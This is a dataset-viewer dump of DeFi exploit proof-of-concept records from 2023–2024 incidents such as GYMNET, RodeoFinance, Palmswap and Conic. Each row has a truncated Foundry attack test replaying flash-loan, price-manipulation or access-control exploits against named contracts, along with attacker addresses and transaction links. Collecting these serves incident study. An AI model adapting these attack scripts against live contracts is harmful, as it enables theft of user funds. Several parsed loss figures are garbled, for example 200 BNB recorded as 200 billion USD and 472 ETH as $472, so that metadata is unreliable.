source_code
stringlengths
878
31.2k
type
stringclasses
1 value
protocol
stringlengths
2
33
date
stringclasses
70 values
file_name
stringlengths
10
41
attack_vector
stringclasses
4 values
content_hash
stringlengths
16
16
collected_at
stringdate
2026-01-07 10:59:16
2026-01-07 10:59:16
_source
stringclasses
1 value
chain
stringclasses
8 values
block_number
int64
1.11M
356M
total_lost_raw
stringlengths
3
127
total_lost_usd
float64
0
19,026B
attacker_address
stringlengths
65
82
attack_contract
stringlengths
70
89
vulnerable_contract
stringlengths
68
82
attack_tx
stringlengths
89
115
postmortem_url
stringclasses
85 values
twitter_url
stringlengths
48
62
has_keyinfo
bool
2 classes
has_analysis
bool
2 classes
has_attack_vector
bool
2 classes
severity
stringclasses
4 values
severity_raw
stringlengths
3
127
category
stringclasses
5 values
exploit_code
stringlengths
0
25.5k
has_exploit_code
bool
2 classes
keyinfo_total_lost
stringlengths
0
127
keyinfo_attacker
stringlengths
0
82
keyinfo_attack_contract
stringlengths
0
89
keyinfo_vulnerable_contract
stringlengths
0
82
keyinfo_attack_tx
stringlengths
0
115
analysis_postmortem
stringclasses
82 values
analysis_twitter
stringlengths
0
62
funds_lost_formatted
stringlengths
2
13
content_richness_score
float64
0.63
10
quality_estimate
stringclasses
3 values
title
stringlengths
20
51
has_total_lost
bool
2 classes
has_vulnerable_contract
bool
2 classes
has_attack_tx
bool
2 classes
has_postmortem
bool
2 classes
pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "../interface.sol"; // @KeyInfo - Total Lost : 4.7K USD // Attacker : https://etherscan.io/address/0x43debe92a7a32dca999593fad617dbd2e6b080a5s // Attack Contract : https://etherscan.io/address/0x5b5a0580bcfd3673820bb249514234afad33e209 // Vulnerable Contrac...
exploit_poc
IUNMI_db27
null
IUNMI_db27_exp.sol
null
8605de1e0fdfc835
2026-01-07T10:59:16.509448
postmortems
ethereum
20,729,672
4.7K USD
4,700
https://etherscan.io/address/0x43debe92a7a32dca999593fad617dbd2e6b080a5s
https://etherscan.io/address/0x5b5a0580bcfd3673820bb249514234afad33e209
https://etherscan.io/address/0xdb27d4ff4be1cd04c34a7cb6f47402c37cb73459
https://etherscan.io/tx/0x45ce017f5a295f387eafb596b4bcb1192dd1c302ccb9d097d7fa2cdf3008b139
https://x.com/TenArmorAlert/status/1834503422655263099
https://x.com/TenArmorAlert/status/1834503422655263099
true
true
false
low
4.7K USD
unknown
function testPoC() public { emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18); vm.startPrank(attacker, attacker); AttackerC attC = new AttackerC(); deal(address(attC), 2.0000000000001075 ether); attC.attack{value: 1.07297e-13 ether}(...
true
4.7K USD
https://etherscan.io/address/0x43debe92a7a32dca999593fad617dbd2e6b080a5s
https://etherscan.io/address/0x5b5a0580bcfd3673820bb249514234afad33e209
https://etherscan.io/address/0xdb27d4ff4be1cd04c34a7cb6f47402c37cb73459
https://etherscan.io/tx/0x45ce017f5a295f387eafb596b4bcb1192dd1c302ccb9d097d7fa2cdf3008b139
https://x.com/TenArmorAlert/status/1834503422655263099
https://x.com/TenArmorAlert/status/1834503422655263099
$4.7K
7.82
medium
IUNMI_db27 Exploit (None)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : Unclear // Attacker : https://bscscan.com/address/0x97eace4702217c1fea71cf6b79647a8ad5ddb0eb // Attack Contract : https://bscscan.com/address/0xb8f83f38e262f28f4e7d80aa5...
exploit_poc
GYMNET
2023-07
GYMNET_exp.sol
flash_loan
beb66d4fa1a8e1f9
2026-01-07T10:59:16.509619
postmortems
bsc
30,448,986
Unclear
null
https://bscscan.com/address/0x97eace4702217c1fea71cf6b79647a8ad5ddb0eb
https://bscscan.com/address/0xb8f83f38e262f28f4e7d80aa5a0216378e92baf2
https://bscscan.com/address/0x6b869795937dd2b6f4e03d5a0ffd07a8ad8c095b
https://bscscan.com/tx/0x7fe96c00880b329aa0fcb00f0ef3a0766c54e13965becf9cc5e0df6fbd0deca6
null
null
true
true
true
medium
Unclear
flash-loan
function testExploit() public { // Attacker deploys fakeUSDT contract,forcing victim's gym to exchange fakeUSDT to earn // Start with below amount of fakeUSDT. Crucial for further adding liquidity to PancakeRouter // Attack contract already had fakeUSDT balance in attack tx deal(address(...
true
Unclear
https://bscscan.com/address/0x97eace4702217c1fea71cf6b79647a8ad5ddb0eb
https://bscscan.com/address/0xb8f83f38e262f28f4e7d80aa5a0216378e92baf2
https://bscscan.com/address/0x6b869795937dd2b6f4e03d5a0ffd07a8ad8c095b
https://bscscan.com/tx/0x7fe96c00880b329aa0fcb00f0ef3a0766c54e13965becf9cc5e0df6fbd0deca6
Unknown
9
high
GYMNET Exploit (2023-07)
false
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~16k // Attacker contract address : https://bscscan.com/address/0x21ad028c185ac004474c21ec5666189885f9e518 // Vulnerable contract : https://bscscan.com/address/0x637de69...
exploit_poc
LUSD
2023-07
LUSD_exp.sol
flash_loan
6b09e832cdfce40f
2026-01-07T10:59:16.509719
postmortems
bsc
29,756,866
~16k
16,000
null
null
https://bscscan.com/address/0x637de69f45f3b66d5389f305088a38109aa0cf7c#code
https://explorer.phalcon.xyz/tx/bsc/0x1eeef7b9a12b13f82ba04a7951c163eb566aa048050d6e9318b725d7bcec6bfa
null
null
true
true
true
medium
~16k
flash-loan
function testSkim() public { deal(address(BEP20USDT), address(this), 0); emit log_named_decimal_uint( "Attacker BEP20USDT balance before attack", BEP20USDT.balanceOf(address(this)), BEP20USDT.decimals() ); takeFlashloan(DPPOracle1); emit log_named_decimal_uint( ...
true
~16k
$16.0K
9.31
high
LUSD Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~472 Ether (~$888K) // Attacker : https://arbiscan.io/address/0x2f3788f2396127061c46fc07bd0fcb91faace328 // Attack Contract : https://arbiscan.io/address/0xe9544ee39821f...
exploit_poc
RodeoFinance
2023-07
RodeoFinance_exp.sol
flash_loan
94559dbb1edcd429
2026-01-07T10:59:16.509803
postmortems
arbitrum
110,043,452
~472 Ether (~$888K)
472
https://arbiscan.io/address/0x2f3788f2396127061c46fc07bd0fcb91faace328
https://arbiscan.io/address/0xe9544ee39821f72c4fc87a5588522230e340aa54
https://arbiscan.io/address/0xf3721d8a2c051643e06bf2646762522fa66100da
https://arbiscan.io/tx/0xb1be5dee3852c818af742f5dd44def285b497ffc5c2eda0d893af542a09fb25a
null
null
true
true
true
low
~472 Ether (~$888K)
flash-loan
function testExploit() public { // Begin with the specific amount of unsETH (info about amount taken from the above attack tx) // the attackers manipulated the price of TWAP Oracle through multiple transactions // such as https://arbiscan.io/tx/0x5f16637460021994d40430dadc020fffdb96937cfaf2b8cb6...
true
~472 Ether (~$888K)
https://arbiscan.io/address/0x2f3788f2396127061c46fc07bd0fcb91faace328
https://arbiscan.io/address/0xe9544ee39821f72c4fc87a5588522230e340aa54
https://arbiscan.io/address/0xf3721d8a2c051643e06bf2646762522fa66100da
https://arbiscan.io/tx/0xb1be5dee3852c818af742f5dd44def285b497ffc5c2eda0d893af542a09fb25a
$472
10
high
RodeoFinance Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$119K // Attacker : https://bscscan.com/address/0xe84ef3615b8df94c52e5b6ef21acbf0039b29113 // Attacker Contract : https://bscscan.com/address/0x6191203510c2a6442faecdb6...
exploit_poc
Utopia
2023-07
Utopia_exp.sol
null
c2aec66884e956a7
2026-01-07T10:59:16.509879
postmortems
bsc
30,119,396
~$119K
119,000
https://bscscan.com/address/0xe84ef3615b8df94c52e5b6ef21acbf0039b29113
null
https://bscscan.com/address/0xb1da08c472567eb0ec19639b1822f578d39f3333
https://bscscan.com/tx/0xeb4eb487f58d39c05778fed30cd001b986d3c52279e44f46b2de2773e7ee1d5e
null
null
true
true
false
high
~$119K
unknown
function testExploit() public { deal(address(WBNB), address(this), 0.01 ether); WBNB.approve(address(Router), type(uint256).max); Utopia.approve(address(Router), type(uint256).max); emit log_named_decimal_uint( "Attacker WBNB balance before exploit", WBNB.balanceOf(address(th...
true
~$119K
https://bscscan.com/address/0xe84ef3615b8df94c52e5b6ef21acbf0039b29113
https://bscscan.com/address/0xb1da08c472567eb0ec19639b1822f578d39f3333
https://bscscan.com/tx/0xeb4eb487f58d39c05778fed30cd001b986d3c52279e44f46b2de2773e7ee1d5e
$119.0K
7.74
medium
Utopia Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~200BNB // Attacker : 0x00703face6621bd207d3b4ac9867058190c0bb09 // Attack Contract : 0xcdf0eb202cfd1f502f3fdca9006a4b5729aadebc // Vulnerable Contract : 0xed56784bc8f2c...
exploit_poc
Bamboo
2023-07
Bamboo_exp.sol
flash_loan
610a4f51346aae04
2026-01-07T10:59:16.509930
postmortems
bsc
29,668,034
~200BNB
200,000,000,000
null
null
null
https://explorer.phalcon.xyz/tx/bsc/0x88a6c2c3ce86d4e0b1356861b749175884293f4302dbfdbfb16a5e373ab58a10
https://twitter.com/Phalcon_xyz/status/1676220090142916611
null
true
true
true
critical
~200BNB
flash-loan
function testExploit() public { // get a flash loan (lets mock it out) deal(address(wbnb), address(this), 4000 ether); console.log("start balance after flashloan", toEth(wbnb.balanceOf(address(this)))); uint256 bambooBalance = bamboo.balanceOf(address(wbnbBambooPair)); address...
true
~200BNB
https://explorer.phalcon.xyz/tx/bsc/0x88a6c2c3ce86d4e0b1356861b749175884293f4302dbfdbfb16a5e373ab58a10
https://twitter.com/Phalcon_xyz/status/1676220090142916611
$200000.00M
7.55
medium
Bamboo Exploit (2023-07)
true
false
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~80K USD$ // Attacker : https://bscscan.com/address/0xdc459596aed13b9a52fb31e20176a7d430be8b94 // Attack Contract : https://bscscan.com/address/0x5336a15f27b74f62cc18238...
exploit_poc
WGPT
2023-07
WGPT_exp.sol
flash_loan
6592172eefcd4ebe
2026-01-07T10:59:16.509982
postmortems
bsc
29,891,709
~80K USD$
80,000
https://bscscan.com/address/0xdc459596aed13b9a52fb31e20176a7d430be8b94
https://bscscan.com/address/0x5336a15f27b74f62cc182388c005df419ffb58b8
https://bscscan.com/address/0x1f415255f7e2a8546559a553e962de7bc60d7942
https://bscscan.com/tx/0x258e53526e5a48feb1e4beadbf7ee53e07e816681ea297332533371032446bfd
null
null
true
true
true
medium
~80K USD$
flash-loan
function testExploit() public { deal(address(BUSDT), address(this), 0); emit log_named_decimal_uint("Attacker BUSDT balance before", BUSDT.balanceOf(address(this)), BUSDT.decimals()); ExpToken.approve(address(Router), type(uint256).max); BUSDT.approve(address(Router), type(uint256).max);...
true
~80K USD$
https://bscscan.com/address/0xdc459596aed13b9a52fb31e20176a7d430be8b94
https://bscscan.com/address/0x5336a15f27b74f62cc182388c005df419ffb58b8
https://bscscan.com/address/0x1f415255f7e2a8546559a553e962de7bc60d7942
https://bscscan.com/tx/0x258e53526e5a48feb1e4beadbf7ee53e07e816681ea297332533371032446bfd
$80.0K
10
high
WGPT Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$900K // Attacker : https://bscscan.com/address/0xf84efa8a9f7e68855cf17eaac9c2f97a9d131366 // Attack Contract : https://bscscan.com/address/0x55252a6d50bfad0e5f10095412...
exploit_poc
Palmswap
2023-07
Palmswap_exp.sol
flash_loan
c57eea31f152889d
2026-01-07T10:59:16.510051
postmortems
bsc
30,248,637
~$900K
900,000
https://bscscan.com/address/0xf84efa8a9f7e68855cf17eaac9c2f97a9d131366
https://bscscan.com/address/0x55252a6d50bfad0e5f1009541284c783686f7f25
https://bscscan.com/address/0xd990094a611c3de34664dd3664ebf979a1230fc1
https://bscscan.com/tx/0x62dba55054fa628845fecded658ff5b1ec1c5823f1a5e0118601aa455a30eac9
null
null
true
true
true
high
~$900K
flash-loan
function testExploit() public { deal(address(BUSDT), address(this), 0); BUSDT.approve(plpManager, type(uint256).max); BUSDT.approve(address(RadiantLP), type(uint256).max); PLP.approve(fPLP, type(uint256).max); emit log_named_decimal_uint( "Attacker balance of BUSDT b...
true
~$900K
https://bscscan.com/address/0xf84efa8a9f7e68855cf17eaac9c2f97a9d131366
https://bscscan.com/address/0x55252a6d50bfad0e5f1009541284c783686f7f25
https://bscscan.com/address/0xd990094a611c3de34664dd3664ebf979a1230fc1
https://bscscan.com/tx/0x62dba55054fa628845fecded658ff5b1ec1c5823f1a5e0118601aa455a30eac9
$900.0K
9.07
high
Palmswap Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~7K USD$ // Attacker : https://bscscan.com/address/0x10703f7114dce7beaf8d23cde4bf72130bb0f56a // Attack Contract : https://bscscan.com/address/0x45aa258ad08eeeb841c1c02e...
exploit_poc
ApeDAO
2023-07
ApeDAO_exp.sol
flash_loan
7d850e97dd75e65e
2026-01-07T10:59:16.510104
postmortems
bsc
30,072,293
~7K USD$
7,000
https://bscscan.com/address/0x10703f7114dce7beaf8d23cde4bf72130bb0f56a
https://bscscan.com/address/0x45aa258ad08eeeb841c1c02eca7658f9dd4779c0
https://bscscan.com/address/0xb47955b5b7eaf49c815ebc389850eb576c460092
https://bscscan.com/tx/0x8d35dfd9968ce61fb969ffe8dcc29eeeae864e466d2cb0b7d26ce63644691994
null
null
true
true
true
low
~7K USD$
flash-loan
function testExploit() public { deal(address(BUSDT), address(this), 0); emit log_named_decimal_uint( "BUSDT balance of attacker before exploit", BUSDT.balanceOf(address(this)), BUSDT.decimals() ); DPPOracle1.flashLoan(0, BUSDT.balanceOf(address(DPPOracle1)), address(this), ne...
true
~7K USD$
https://bscscan.com/address/0x10703f7114dce7beaf8d23cde4bf72130bb0f56a
https://bscscan.com/address/0x45aa258ad08eeeb841c1c02eca7658f9dd4779c0
https://bscscan.com/address/0xb47955b5b7eaf49c815ebc389850eb576c460092
https://bscscan.com/tx/0x8d35dfd9968ce61fb969ffe8dcc29eeeae864e466d2cb0b7d26ce63644691994
$7.0K
9.36
high
ApeDAO Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~31K USD$ // Attacker : https://bscscan.com/address/0x3a10408fd7a2b2a43bd14a17c0d4568430b93132 // Attack Contract : https://bscscan.com/address/0x18703a4fd7b3688607abf25...
exploit_poc
NewFi
2023-07
NewFi_exp.sol
null
ec8fa568b960bcc6
2026-01-07T10:59:16.510166
postmortems
bsc
30,043,573
~31K USD$
31,000
https://bscscan.com/address/0x3a10408fd7a2b2a43bd14a17c0d4568430b93132
https://bscscan.com/address/0x18703a4fd7b3688607abf25424b6ab304def2512
https://bscscan.com/address/0xb8dc09eec82cab2e86c7edc8dd5882dd92d22411
https://bscscan.com/tx/0x557628123d137ea49564e4dccff5f5d1e508607e96dd20fe99a670519b679cb5
null
https://twitter.com/Phalcon_xyz/status/1680961588323557376
true
true
false
medium
~31K USD$
unknown
function testExploit() public { USDT.approve(address(Router), type(uint256).max); BUSD.approve(address(Router), type(uint256).max); BUSD.approve(address(StakedV3), type(uint256).max); BUSD.approve(address(StakedV3), type(uint256).max); Pair1.flash(address(this), 0, BUSD.balanceOf...
true
~31K USD$
https://bscscan.com/address/0x3a10408fd7a2b2a43bd14a17c0d4568430b93132
https://bscscan.com/address/0x18703a4fd7b3688607abf25424b6ab304def2512
https://bscscan.com/address/0xb8dc09eec82cab2e86c7edc8dd5882dd92d22411
https://bscscan.com/tx/0x557628123d137ea49564e4dccff5f5d1e508607e96dd20fe99a670519b679cb5
https://twitter.com/Phalcon_xyz/status/1680961588323557376
$31.0K
8.21
high
NewFi Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~452K USD$ // Attacker : https://polygonscan.com/address/0xfd2d3ffb05ad00e61e3c8d8701cb9036b7a16d02 // Attack Contract : https://polygonscan.com/address/0xdfcdb5a86b167b...
exploit_poc
Libertify
2023-07
Libertify_exp.sol
flash_loan
99ea34252bb6530b
2026-01-07T10:59:16.510217
postmortems
polygon
44,941,584
~452K USD$
452,000
https://polygonscan.com/address/0xfd2d3ffb05ad00e61e3c8d8701cb9036b7a16d02
https://polygonscan.com/address/0xdfcdb5a86b167b3a418f3909d6f7a2f2873f2969
https://polygonscan.com/address/0x9c80a455ecaca7025a45f5fa3b85fd6a462a447b
https://polygonscan.com/tx/0x7320accea0ef1d7abca8100c82223533b624c82d3e8d445954731495d4388483
null
https://twitter.com/peckshield/status/1678688731908411393
true
true
true
high
~452K USD$
flash-loan
false
~452K USD$
https://polygonscan.com/address/0xfd2d3ffb05ad00e61e3c8d8701cb9036b7a16d02
https://polygonscan.com/address/0xdfcdb5a86b167b3a418f3909d6f7a2f2873f2969
https://polygonscan.com/address/0x9c80a455ecaca7025a45f5fa3b85fd6a462a447b
https://polygonscan.com/tx/0x7320accea0ef1d7abca8100c82223533b624c82d3e8d445954731495d4388483
https://twitter.com/peckshield/status/1678688731908411393
$452.0K
8
high
Libertify Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~180K USD$ // Attacker : https://etherscan.io/address/0xbf9df575670c739d9bf1424d4913e7244ed3ff66 // Attack Contract : https://etherscan.io/address/0x1ae3929e1975043e5443...
exploit_poc
CIVNFT
2023-07
CIVNFT_exp.sol
access_control
f3690bbe87db29b1
2026-01-07T10:59:16.510285
postmortems
ethereum
17,649,875
~180K USD$
180,000
https://etherscan.io/address/0xbf9df575670c739d9bf1424d4913e7244ed3ff66
https://etherscan.io/address/0x1ae3929e1975043e5443868be91cac12d8cc25ec
https://etherscan.io/address/0xf169bd68ed72b2fdc3c9234833197171aa000580
https://etherscan.io/tx/0x93a033917fcdbd5fe8ae24e9fe22f002949cba2f621a1c43a54f6519479caceb
null
null
true
true
true
high
~180K USD$
access-control
function testExploit() public { emit log_named_decimal_uint("Attacker CIV balance before exploit", CIV.balanceOf(address(this)), CIV.decimals()); // Calling vulnerable function in CIVNFT contract call0x7ca06d68(); emit log_named_decimal_uint("Attacker CIV balance after exploit", CIV.bala...
true
~180K USD$
https://etherscan.io/address/0xbf9df575670c739d9bf1424d4913e7244ed3ff66
https://etherscan.io/address/0x1ae3929e1975043e5443868be91cac12d8cc25ec
https://etherscan.io/address/0xf169bd68ed72b2fdc3c9234833197171aa000580
https://etherscan.io/tx/0x93a033917fcdbd5fe8ae24e9fe22f002949cba2f621a1c43a54f6519479caceb
$180.0K
9.18
high
CIVNFT Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~150K USD$ // Attacker : https://bscscan.com/address/0x25bcbbb92c2ae9d0c6f4db814e46fd5c632e2bd3 // Attack Contract : https://bscscan.com/address/0x9cffc95e742d22c1446a3d...
exploit_poc
Carson
2023-07
Carson_exp.sol
flash_loan
fdcc073149a72ae5
2026-01-07T10:59:16.510336
postmortems
bsc
30,306,324
~150K USD$
150,000
https://bscscan.com/address/0x25bcbbb92c2ae9d0c6f4db814e46fd5c632e2bd3
https://bscscan.com/address/0x9cffc95e742d22c1446a3d22e656bb23835a38ac
null
https://bscscan.com/tx/0x37d921a6bb0ecdd8f1ec918d795f9c354727a3ff6b0dba98a512fceb9662a3ac
null
null
true
true
true
high
~150K USD$
flash-loan
function testExploit() public { deal(address(BUSDT), address(this), 0); emit log_named_decimal_uint( "Attacker balance of BUSDT before exploit", BUSDT.balanceOf(address(this)), BUSDT.decimals() ); DPPOracle1.flashLoan(0, BUSDT.balanceOf(address(DPPOracle1)), address(this), n...
true
~150K USD$
https://bscscan.com/address/0x25bcbbb92c2ae9d0c6f4db814e46fd5c632e2bd3
https://bscscan.com/address/0x9cffc95e742d22c1446a3d22e656bb23835a38ac
https://bscscan.com/tx/0x37d921a6bb0ecdd8f1ec918d795f9c354727a3ff6b0dba98a512fceb9662a3ac
$150.0K
8.22
high
Carson Exploit (2023-07)
true
false
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$505K // Attacker : https://bscscan.com/address/0xa6566574edc60d7b2adbacedb71d5142cf2677fb // Attacker Contract : https://bscscan.com/address/0xd138b9a58d3e5f4be1cd5ec9...
exploit_poc
BNO
2023-07
BNO_exp.sol
null
6a28a8ad3c7d2ee2
2026-01-07T10:59:16.510392
postmortems
bsc
30,056,629
~$505K
505,000
https://bscscan.com/address/0xa6566574edc60d7b2adbacedb71d5142cf2677fb
null
https://bscscan.com/address/0xdca503449899d5649d32175a255a8835a03e4006
https://bscscan.com/tx/0x33fed54de490797b99b2fc7a159e43af57e9e6bdefc2c2d052dc814cfe0096b9
null
null
true
true
false
high
~$505K
unknown
function testExploit() public { cheats.startPrank(attackerContract); NFT.transferFrom(attacker, address(this), 13); NFT.transferFrom(attacker, address(this), 14); cheats.stopPrank(); emit log_named_decimal_uint( "Attacker balance of BNO before exploit", BNO.balanceOf...
true
~$505K
https://bscscan.com/address/0xa6566574edc60d7b2adbacedb71d5142cf2677fb
https://bscscan.com/address/0xdca503449899d5649d32175a255a8835a03e4006
https://bscscan.com/tx/0x33fed54de490797b99b2fc7a159e43af57e9e6bdefc2c2d052dc814cfe0096b9
$505.0K
7.78
medium
BNO Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~46K USD$ // Attacker : https://etherscan.io/address/0x00693a01221a5e93fb872637e3a9391ef5f48300 // Attack Contract : https://etherscan.io/address/0x3f99d5cd830203a3027eb...
exploit_poc
Bao
2023-07
Bao_exp.sol
flash_loan
f7ae6f8a8d8e8afe
2026-01-07T10:59:16.510441
postmortems
ethereum
17,620,870
~46K USD$
46,000
https://etherscan.io/address/0x00693a01221a5e93fb872637e3a9391ef5f48300
https://etherscan.io/address/0x3f99d5cd830203a3027eb0ed6548db7f81c3408f
https://etherscan.io/address/0xb0f8fe96b4880adbdede0ddf446bd1e7ef122c4e
https://etherscan.io/tx/0xdd7dd68cd879d07cfc2cb74606baa2a5bf18df0e3bda9f6b43f904f4f7bbdfc1
null
https://twitter.com/PeckShieldAlert/status/1676224397248454657
true
true
true
medium
~46K USD$
flash-loan
false
~46K USD$
https://etherscan.io/address/0x00693a01221a5e93fb872637e3a9391ef5f48300
https://etherscan.io/address/0x3f99d5cd830203a3027eb0ed6548db7f81c3408f
https://etherscan.io/address/0xb0f8fe96b4880adbdede0ddf446bd1e7ef122c4e
https://etherscan.io/tx/0xdd7dd68cd879d07cfc2cb74606baa2a5bf18df0e3bda9f6b43f904f4f7bbdfc1
https://twitter.com/PeckShieldAlert/status/1676224397248454657
$46.0K
8
high
Bao Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo -- Total Lost : ~20999 USD // TX : https://app.blocksec.com/explorer/tx/eth/0xfc872bf5ca8f04b18b82041ec563e4abf2e31e1fc27d1ea5dee39bc8a79d2d06 // Attacker : https://etherscan.io/addres...
exploit_poc
USDTStakingContract28
2023-07
USDTStakingContract28_exp.sol
null
cee37b2283e5c9c2
2026-01-07T10:59:16.510506
postmortems
ethereum
17,696,562
~20999 USD
20,999
https://etherscan.io/address/0x000000915f1b10b0ef5c4efe696ab65f13f36e74
https://etherscan.io/address/0xb754ebdba9b009113b4cf445a7cb0fc9227648ad
null
null
null
null
true
false
false
medium
~20999 USD
unknown
function testExploit() public { emit log_named_decimal_uint("[Begin] Attacker USDT balance before exploit", USDT.balanceOf(address(this)), 6); money = new Money(); money.attack(); emit log_named_decimal_uint( "[End] Attacker USDT balance after exploit", USDT.balanceOf(address...
true
https://etherscan.io/address/0x000000915f1b10b0ef5c4efe696ab65f13f36e74
https://etherscan.io/address/0xb754ebdba9b009113b4cf445a7cb0fc9227648ad
$21.0K
5.21
medium
USDTStakingContract28 Exploit (2023-07)
true
false
false
false
// SPDX-License-Identifier: MIT pragma solidity ^0.8.9; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~9k US$ // Attacker : https://bscscan.com/address/0xc5001f60db92afcc23177a6c6b440a4226cb58bf // Attack Contract : https://bscscan.com/address/0xba91db0b31d60c45e0b03e6d515e45fc...
exploit_poc
MintoFinance
2023-07
MintoFinance_exp.sol
null
db7c99bae2f44ab3
2026-01-07T10:59:16.510556
postmortems
bsc
30,214,253
~9k US$
9,000
https://bscscan.com/address/0xc5001f60db92afcc23177a6c6b440a4226cb58bf
https://bscscan.com/address/0xba91db0b31d60c45e0b03e6d515e45fcabc7b1cd
https://bscscan.com/address/0xdbf1c56b2ad121fe705f9b68225378aa6784f3e5
https://explorer.phalcon.xyz/tx/bsc/0x53be95dc8ffbc80060215133f76f48df35deef3cd7e1803e24b1e2f8aa53440b
null
https://twitter.com/bbbb/status/1683180340548890631?s=20
true
true
false
low
~9k US$
unknown
false
~9k US$
https://bscscan.com/address/0xc5001f60db92afcc23177a6c6b440a4226cb58bf
https://bscscan.com/address/0xba91db0b31d60c45e0b03e6d515e45fcabc7b1cd
https://bscscan.com/address/0xdbf1c56b2ad121fe705f9b68225378aa6784f3e5
https://explorer.phalcon.xyz/tx/bsc/0x53be95dc8ffbc80060215133f76f48df35deef3cd7e1803e24b1e2f8aa53440b
https://twitter.com/bbbb/status/1683180340548890631?s=20
$9.0K
6.01
medium
MintoFinance Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~934K USD$ // Attacker : https://etherscan.io/address/0xb6369f59fc24117b16742c9dfe064894d03b3b80 // Attack Contract : https://etherscan.io/address/0x486cb3f61771ed548369...
exploit_poc
Conic02
2023-07
Conic02_exp.sol
flash_loan
cabff016f1959a77
2026-01-07T10:59:16.510608
postmortems
ethereum
17,743,470
~934K USD$
934,000
https://etherscan.io/address/0xb6369f59fc24117b16742c9dfe064894d03b3b80
https://etherscan.io/address/0x486cb3f61771ed5483691dd65f4186da9e37c68e
https://etherscan.io/address/0x369cbc5c6f139b1132d3b91b87241b37fc5b971f
https://etherscan.io/tx/0x37acd17a80a5f95728459bfea85cb2e1f64b4c75cf4a4c8dcb61964e26860882
https://medium.com/@ConicFinance/post-mortem-eth-and-crvusd-omnipool-exploits-c9c7fa213a3d
https://twitter.com/spreekaway/status/1682467603518726144
true
true
true
high
~934K USD$
flash-loan
false
~934K USD$
https://etherscan.io/address/0xb6369f59fc24117b16742c9dfe064894d03b3b80
https://etherscan.io/address/0x486cb3f61771ed5483691dd65f4186da9e37c68e
https://etherscan.io/address/0x369cbc5c6f139b1132d3b91b87241b37fc5b971f
https://etherscan.io/tx/0x37acd17a80a5f95728459bfea85cb2e1f64b4c75cf4a4c8dcb61964e26860882
https://medium.com/@ConicFinance/post-mortem-eth-and-crvusd-omnipool-exploits-c9c7fa213a3d
https://twitter.com/spreekaway/status/1682467603518726144
$934.0K
8
high
Conic02 Exploit (2023-07)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~3.25M USD$ // Attacker : https://etherscan.io/address/0x8d67db0b205e32a5dd96145f022fa18aae7dc8aa // Attack Contract : https://etherscan.io/address/0x743599ba5cfa3ce8c59...
exploit_poc
Conic
2023-07
Conic_exp.sol
flash_loan
8c6190ff8008f2fe
2026-01-07T10:59:16.510670
postmortems
ethereum
17,740,954
~3.25M USD$
3,250,000
https://etherscan.io/address/0x8d67db0b205e32a5dd96145f022fa18aae7dc8aa
https://etherscan.io/address/0x743599ba5cfa3ce8c59691af5ef279aaafa2e4eb
https://etherscan.io/address/0xbb787d6243a8d450659e09ea6fd82f1c859691e9
https://etherscan.io/tx/0x8b74995d1d61d3d7547575649136b8765acb22882960f0636941c44ec7bbe146
https://medium.com/@ConicFinance/post-mortem-eth-and-crvusd-omnipool-exploits-c9c7fa213a3d
https://twitter.com/BlockSecTeam/status/1682356244299010049
true
true
true
critical
~3.25M USD$
flash-loan
false
~3.25M USD$
https://etherscan.io/address/0x8d67db0b205e32a5dd96145f022fa18aae7dc8aa
https://etherscan.io/address/0x743599ba5cfa3ce8c59691af5ef279aaafa2e4eb
https://etherscan.io/address/0xbb787d6243a8d450659e09ea6fd82f1c859691e9
